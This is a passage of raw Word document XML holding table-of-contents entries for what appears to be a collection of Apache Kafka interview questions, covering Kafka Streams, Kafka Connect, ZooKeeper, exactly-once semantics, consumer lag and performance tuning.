              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308271 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1043</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="493B8CEC" w14:textId="0AB92C6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7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are Kafka Streams, and how are they different from regular Kafka consumers?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308272 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1044</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C9A068A" w14:textId="7B4F000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7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the Kafka Streams API, its use cases for stream processing, and how it differs from regular Kafka consumers in terms of functionality?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308273 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1046</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0BF99695" w14:textId="1A62F64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7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Kafka Connect framework, and how does it help in data integration?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308274 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1049</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="01127952" w14:textId="55B1540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7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scuss Kafka Connect and how it allows for easy integration between Kafka and external systems (e.g., databases, HDFS, and external message queues)?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308275 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1052</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3CC4F231" w14:textId="3A66039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7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purpose of Kafka's ZooKeeper, and can Kafka work without ZooKeeper?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308276 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1054</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A8C0C81" w14:textId="0A3262D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7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the role of ZooKeeper in Kafka, its responsibility for managing broker metadata, and the current move towards KRaft (Kafka Raft) mode that removes the dependency on ZooKeeper?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308277 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1056</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19C899D7" w14:textId="4FBEFDC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7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does Kafka handle backpressure?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308278 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1057</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FC292F0" w14:textId="23C3162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7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scuss how Kafka handles backpressure and the role of consumer lag and producer rate limits in managing this?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308279 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1059</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="268BE61E" w14:textId="627F5AD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8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Kafka’s exactly-once semantics. How is it implemented, and why is it important?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308280 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1061</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6007DA13" w14:textId="1C60668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8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Kafka’s exactly-once semantics, the configuration required to achieve it, and the scenarios where this feature is critical?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308281 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1062</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2845E831" w14:textId="170D9BC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8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impact of Kafka's producer buffer size on message delivery?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308282 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1065</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1CE958C0" w14:textId="6EE3409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8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scuss how buffer sizes in the Kafka producer affect message delivery, latency, and throughput?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308283 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1067</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3EFE7306" w14:textId="4626A54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8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does Kafka handle message ordering within a partition?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308284 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1069</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="428F8CA3" w14:textId="41C6F31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8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how Kafka ensures message order within a partition and the implications of partitioning on message order?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308285 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1070</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="181332CB" w14:textId="3A4F135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8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are Kafka Streams and how do they differ from Spark Streaming?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308286 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1072</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3390469A" w14:textId="7797C9C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8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Compare Kafka Streams with Spark Streaming, highlighting the advantages of using Kafka Streams for real-time stream processing?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308287 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1074</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="40F145E8" w14:textId="4E80BE2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8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do you handle message duplication in Kafka?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308288 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1076</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0313A575" w14:textId="1C36A54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8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scuss the techniques to prevent message duplication in Kafka and how idempotence and exactly-once semantics help with this?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308289 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1078</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23BF3A9E" w14:textId="2F69339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9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would you do if a Kafka consumer is lagging behind?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308290 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1080</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A389351" w14:textId="214EDB1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9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escribe how you would troubleshoot and resolve consumer lag issues, including identifying the root cause and optimizing consumer performance?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308291 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1082</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67788C0D" w14:textId="3C578B7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9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would you optimize Kafka performance in a production environment?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308292 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1084</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="16A1B1DB" w14:textId="57EFA7A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9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scuss strategies to optimize Kafka, including tuning broker configurations, optimizing producer and consumer settings, and ensuring adequate hardware resources?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308293 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1086</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5430DDF2" w14:textId="113464C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9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are common Kafka issues and how can they be fixed?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308294 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1088</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="71BF8060" w14:textId="33D60CB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9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List common Kafka problems, such as disk full errors, under-replicated partitions, and slow consumers, and explain how to resolve them?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308295 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1090</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
